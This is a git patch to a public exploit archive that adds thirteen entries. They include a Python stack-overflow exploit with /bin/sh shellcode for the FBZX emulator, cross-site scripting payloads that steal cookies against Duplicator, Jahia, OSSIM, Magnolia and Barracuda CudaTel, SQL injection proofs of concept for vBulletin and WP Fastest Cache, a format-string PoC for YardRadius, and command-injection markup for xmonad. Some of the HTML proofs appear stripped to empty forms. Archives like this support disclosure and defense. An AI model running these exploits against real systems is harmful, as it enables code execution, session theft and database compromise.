From 26f0706a86a0a35a85a7fb151acde9461e346bb2 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 12 Nov 2015 05:03:25 +0000 Subject: [PATCH] DB: 2015-11-12 13 new exploits --- files.csv | 13 +++++++ platforms/hardware/remote/38663.txt | 5 +-- platforms/hardware/remote/38671.txt | 13 +++++++ platforms/linux/local/38681.py | 48 ++++++++++++++++++++++++ platforms/linux/remote/38680.html | 15 ++++++++ platforms/php/webapps/38673.txt | 21 +++++++++++ platforms/php/webapps/38674.txt | 7 ++++ platforms/php/webapps/38675.html | 22 +++++++++++ platforms/php/webapps/38676.txt | 9 +++++ platforms/php/webapps/38677.txt | 53 +++++++++++++++++++++++++++ platforms/php/webapps/38678.txt | 44 ++++++++++++++++++++++ platforms/php/webapps/38679.txt | 57 +++++++++++++++++++++++++++++ platforms/php/webapps/38682.txt | 9 +++++ platforms/php/webapps/38683.txt | 29 +++++++++++++++ platforms/windows/local/38672.txt | 13 +++++++ 15 files changed, 355 insertions(+), 3 deletions(-) create mode 100755 platforms/hardware/remote/38671.txt create mode 100755 platforms/linux/local/38681.py create mode 100755 platforms/linux/remote/38680.html create mode 100755 platforms/php/webapps/38673.txt create mode 100755 platforms/php/webapps/38674.txt create mode 100755 platforms/php/webapps/38675.html create mode 100755 platforms/php/webapps/38676.txt create mode 100755 platforms/php/webapps/38677.txt create mode 100755 platforms/php/webapps/38678.txt create mode 100755 platforms/php/webapps/38679.txt create mode 100755 platforms/php/webapps/38682.txt create mode 100755 platforms/php/webapps/38683.txt create mode 100755 platforms/windows/local/38672.txt diff --git a/files.csv b/files.csv index 06d675562..a81b0f566 100755 --- a/files.csv +++ b/files.csv @@ -34941,3 +34941,16 @@ id,file,description,date,author,platform,type,port 38667,platforms/windows/remote/38667.py,"ReadyMedia Remote Heap Buffer Overflow Vulnerability",2013-07-15,"Zachary Cutlip",windows,remote,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption Information Disclosure Vulnerability",2013-07-09,"Brad Antoniewicz",windows,local,0 38669,platforms/multiple/remote/38669.txt,"MongoDB 'conn' Mongo Object Remote Code Execution Vulnerability",2013-06-04,"SCRT Security",multiple,remote,0 +38671,platforms/hardware/remote/38671.txt,"Barracuda CudaTel Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote,0 +38672,platforms/windows/local/38672.txt,"YardRadius Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 +38673,platforms/php/webapps/38673.txt,"Collabtive Multiple Security Vulnerabilities",2013-07-22,"Enrico Cinquini",php,webapps,0 +38674,platforms/php/webapps/38674.txt,"WordPress FlagEm Plugin 'cID' Parameter Cross Site Scripting Vulnerability",2013-07-22,"IeDb ir",php,webapps,0 +38675,platforms/php/webapps/38675.html,"Magnolia CMS Multiple Cross Site Scripting Vulnerabilities",2013-07-24,"High-Tech Bridge",php,webapps,0 +38676,platforms/php/webapps/38676.txt,"WordPress Duplicator Plugin Cross Site Scripting Vulnerability",2013-07-24,"High-Tech Bridge",php,webapps,0 +38677,platforms/php/webapps/38677.txt,"VBulletin <= 4.0.2 'update_order' Parameter SQL Injection Vulnerability",2013-07-24,n3tw0rk,php,webapps,0 +38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0 +38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0 +38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0 +38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0 +38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 +38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0 diff --git a/platforms/hardware/remote/38663.txt b/platforms/hardware/remote/38663.txt index f4c5aa0e4..c58307d35 100755 --- a/platforms/hardware/remote/38663.txt +++ b/platforms/hardware/remote/38663.txt @@ -1,7 +1,6 @@ -# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on -Adsl Modems +# Exploit Title: Huawei HG630a and HG630a-50 Default SSH Admin Password on Adsl Modems # Date: 10.11.2015 -# Exploit Author: Murat Sahin +# Exploit Author: Murat Sahin (@murtshn) # Vendor Homepage: Huawei # Version: HG630a and HG630a-50 # Tested on: linux,windows diff --git a/platforms/hardware/remote/38671.txt b/platforms/hardware/remote/38671.txt new file mode 100755 index 000000000..19b97287b --- /dev/null +++ b/platforms/hardware/remote/38671.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/61353/info + +Barracuda CudaTel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Barracuda CudaTel 2.6.02.04 is vulnerable; other versions may also be affected. + +http://www.example.com/gui/route/route?%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C +http://www.example.com/gui/route/route?_=1354073910062&bbx_outbound_route_flag_locked=%3C[CLIENT-SIDE SCRIPT +CODE!]%20%3C +http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# +http://www.example.com/ajax-html/queues_wall_stub.html?_=1354074247075%20%3C[CLIENT-SIDE SCRIPT CODE!]%20%3C# \ No newline at end of file diff --git a/platforms/linux/local/38681.py b/platforms/linux/local/38681.py new file mode 100755 index 000000000..6397c447d --- /dev/null +++ b/platforms/linux/local/38681.py @@ -0,0 +1,48 @@ +# Exploit Author: Juan Sacco - http://www.exploitpack.com +# Program: fbzx - ZX Spectrum Emulator for X +# Tested on: GNU/Linux - Kali Linux 2.0 x86 +# +# Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow +# vulnerability because the application fails to perform adequate +# boundary-checks on user-supplied input. +# +# An attacker could exploit this issue to execute arbitrary code in the +# context of the application. Failed exploit attempts will result in a +# denial-of-service condition. +# +# Vendor homepage: *http://www.rastersoft.com/ * +# Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/ +# MD5: 0fc1d2e9c374c1156b2b02186a9f8980 + +import os,subprocess +def run(): + try: + print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco" + print "# It's Fuzzing time on unusable exploits" + print "# This exploit is for educational purposes only" + # Basic structure: JUNK + SHELLCODE + NOPS + EIP + + junk = "\x41"*8 + shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + nops = "\x90"*5010 + eip = "\x10\xd3\xff\xbf" + subprocess.call(["fbzx",' ', junk + shellcode + nops + eip]) + + except OSError as e: + if e.errno == os.errno.ENOENT: + print "FBZX not found!" + else: + print "Error executing exploit" + raise + +def howtousage(): + print "Sorry, something went wrong" + sys.exit(-1) + +if __name__ == '__main__': + try: + print "Exploit FBZX 2.10 Local Overflow Exploit" + print "Author: Juan Sacco" + except IndexError: + howtousage() +run() diff --git a/platforms/linux/remote/38680.html b/platforms/linux/remote/38680.html new file mode 100755 index 000000000..6a8192116 --- /dev/null +++ b/platforms/linux/remote/38680.html @@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/61491/info + +XMonad.Hooks.DynamicLog module for xmonad is prone to multiple remote command-injection vulnerabilities. + +Successful exploits will result in the execution of arbitrary commands in the context of the affected applications. This may aid in further attacks. + + + +<action=xclock>An innocent title</action> + + +

Good bye, cruel world

+ + + diff --git a/platforms/php/webapps/38673.txt b/platforms/php/webapps/38673.txt new file mode 100755 index 000000000..992d9a05b --- /dev/null +++ b/platforms/php/webapps/38673.txt @@ -0,0 +1,21 @@ +source: http://www.securityfocus.com/bid/61384/info + +Collabtive is prone to multiple cross-site scripting vulnerabilities, an arbitrary file upload vulnerability, and a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to bypass certain security restrictions, upload and execute arbitrary script code in the context of the affected web server process. This may let attackers steal cookie-based authentication credentials, perform unauthorized actions, or compromise the application; other attacks are possible. + +Collabtive 1.0 is vulnerable; other versions may also be affected. + +File upload: + +https://www.example.com/secprj/files/standard/avatar/uploadedshell_104185.php + +Cross-site scripting: + +https://www.example.com/secprj/managechat.php?userto=&uid=2 + +"> + +Security-bypass: + +https://www.example.com/secprj/manageuser.php?action=del&id=5 \ No newline at end of file diff --git a/platforms/php/webapps/38674.txt b/platforms/php/webapps/38674.txt new file mode 100755 index 000000000..a2ef0ae47 --- /dev/null +++ b/platforms/php/webapps/38674.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/61401/info + +The FlagEm plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/wp-content/plugins/FlagEm/flagit.php?cID=[Xss] \ No newline at end of file diff --git a/platforms/php/webapps/38675.html b/platforms/php/webapps/38675.html new file mode 100755 index 000000000..d01d9d494 --- /dev/null +++ b/platforms/php/webapps/38675.html @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/61423/info + +Magnolia CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Magnolia CMS versions 4.5.7, 4.5.8, 4.5.9, 5.0 and 5.0.1 are vulnerable. + +
+ + + + + + + +
+ + + diff --git a/platforms/php/webapps/38676.txt b/platforms/php/webapps/38676.txt new file mode 100755 index 000000000..f40d4f976 --- /dev/null +++ b/platforms/php/webapps/38676.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/61425/info + +The Duplicator plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Duplicator 0.4.4 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38677.txt b/platforms/php/webapps/38677.txt new file mode 100755 index 000000000..5206740c3 --- /dev/null +++ b/platforms/php/webapps/38677.txt @@ -0,0 +1,53 @@ +source: http://www.securityfocus.com/bid/61449/info + +VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +VBulletin 4.0.x are vulnerable. + +The exploit is caused due to a variable named 'update_order' not being +sanitized before being used within an insert into statement. + +if ($_REQUEST['do'] == 'update_order') +{ +$vbulletin->input->clean_array_gpc('r', array( +'force_read_order' => TYPE_ARRAY +)); + +if ($vbulletin->GPC['force_read_order']) +{ +foreach ($vbulletin->GPC['force_read_order'] AS $threadid => $order) +{ +$db->query_write(" +UPDATE " . TABLE_PREFIX . "thread AS thread +SET force_read_order = '$order' +WHERE threadid = '$threadid' +"); +} +} + POC + You will need Admincp Access then go to +site.com/admincp/force_read_thread.php then in the force read order colum +put a ' into one of them to show this + Database error in vBulletin 4.2.1: + +Invalid SQL: + +UPDATE thread AS thread +SET force_read_order = '1'' +WHERE threadid = '5161'; + +MySQL Error : You have an error in your SQL syntax; check the manual that +corresponds to your MySQL server version for the right syntax to use near +'5161'' at line 2 +Error Number : 1064 +Request Date : Thursday, July 25th 2013 @ 01:20:52 AM +Error Date : Thursday, July 25th 2013 @ 01:20:52 AM +Script : +http://www.example.com/admincp/force_read_thread.php?do=update_order +Referrer : http://www.example.com/admincp/force_read_thread.php +IP Address : +Username : n3tw0rk +Classname : +MySQL Version : diff --git a/platforms/php/webapps/38678.txt b/platforms/php/webapps/38678.txt new file mode 100755 index 000000000..a3174237e --- /dev/null +++ b/platforms/php/webapps/38678.txt @@ -0,0 +1,44 @@ +# Exploit Title: WP Fastest Cache 0.8.4.8 Blind SQL Injection +# Date: 11-11-2015 +# Software Link: https://wordpress.org/plugins/wp-fastest-cache/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# Category: webapps + +1. Description + +For this vulnerabilities also WP-Polls needs to be installed. + +Everyone can access wpfc_wppolls_ajax_request(). + +$_POST["poll_id"] is not escaped properly. + +File: wp-fastest-cache\inc\wp-polls.php + +public function wpfc_wppolls_ajax_request() { + $id = strip_tags($_POST["poll_id"]); + $id = mysql_real_escape_string($id); + + $result = check_voted($id); + + if($result){ + echo "true"; + }else{ + echo "false"; + } + die(); +} + +http://security.szurek.pl/wp-fastest-cache-0848-blind-sql-injection.html + +2. Proof of Concept + +
+ + +
+ +3. Solution: + +Update to version 0.8.4.9 \ No newline at end of file diff --git a/platforms/php/webapps/38679.txt b/platforms/php/webapps/38679.txt new file mode 100755 index 000000000..92e2dd621 --- /dev/null +++ b/platforms/php/webapps/38679.txt @@ -0,0 +1,57 @@ +source: http://www.securityfocus.com/bid/61456/info + +Open Source SIEM (OSSIM) is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Open Source SIEM (OSSIM) 4.2.3 is vulnerable; other versions may also be affected. + +https:// +/ossim/vulnmeter/index.php?withoutmenu=%22%3E%3Cimg%20src%3da%20onerror%3dalert%28%27XSS%27%29%3E +https:// +/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu="> +https:// +/ossim/av_inventory/task_edit.php?section="> +https:// +/ossim/nfsen/rrdgraph.php?cmd=get-detailsgraph&profile= + +POST /ossim/vulnmeter/simulate.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) +Gecko/20100101 Firefox/21.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https:// +/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1 +Content-Length: 72 +Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +hosts_alive=1&scan_locally=1¬_resolve=0&scan_server=&targets=blah + + +POST /ossim/vulnmeter/simulate.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:21.0) +Gecko/20100101 Firefox/21.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: https:// +/ossim/vulnmeter/sched.php?smethod=schedule&hosts_alive=1&scan_locally=1&withoutmenu=1 +Content-Length: 72 +Cookie: JXID=blahblah; JXHID=false; PHPSESSID=blahblah +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +hosts_alive=1&scan_locally=1¬_resolve=0&scan_server=Null&targets=blah + + diff --git a/platforms/php/webapps/38682.txt b/platforms/php/webapps/38682.txt new file mode 100755 index 000000000..60303c56d --- /dev/null +++ b/platforms/php/webapps/38682.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/61571/info + +Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected. + +http://www.example.com/engines/manager.jsp?conf=repositoryexplorer&site=%3C/script%3E%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/38683.txt b/platforms/php/webapps/38683.txt new file mode 100755 index 000000000..7474f47ef --- /dev/null +++ b/platforms/php/webapps/38683.txt @@ -0,0 +1,29 @@ +source: http://www.securityfocus.com/bid/61571/info + +Jahia xCM is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied data. + +An attacker could exploit these vulnerabilities to execute arbitrary script code in the context of the affected website. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Jahia xCM 6.6.1.0 r43343 is vulnerable; other versions may also be affected. + +
+ + +
+ + + +
+ + + + + + + +
+ diff --git a/platforms/windows/local/38672.txt b/platforms/windows/local/38672.txt new file mode 100755 index 000000000..2928774b7 --- /dev/null +++ b/platforms/windows/local/38672.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/61356/info + +YardRadius is prone to multiple local format-string vulnerabilities. + +Local attackers can leverage these issues to cause denial-of-service conditions. Due to nature of these issues, arbitrary code-execution within the context of the vulnerable application may also be possible. + +YardRadius 1.1.2-4 is vulnerable; other versions may also be possible. + +The following proof-of-concept is available: + +ln -s radiusd %x + +./%x -v \ No newline at end of file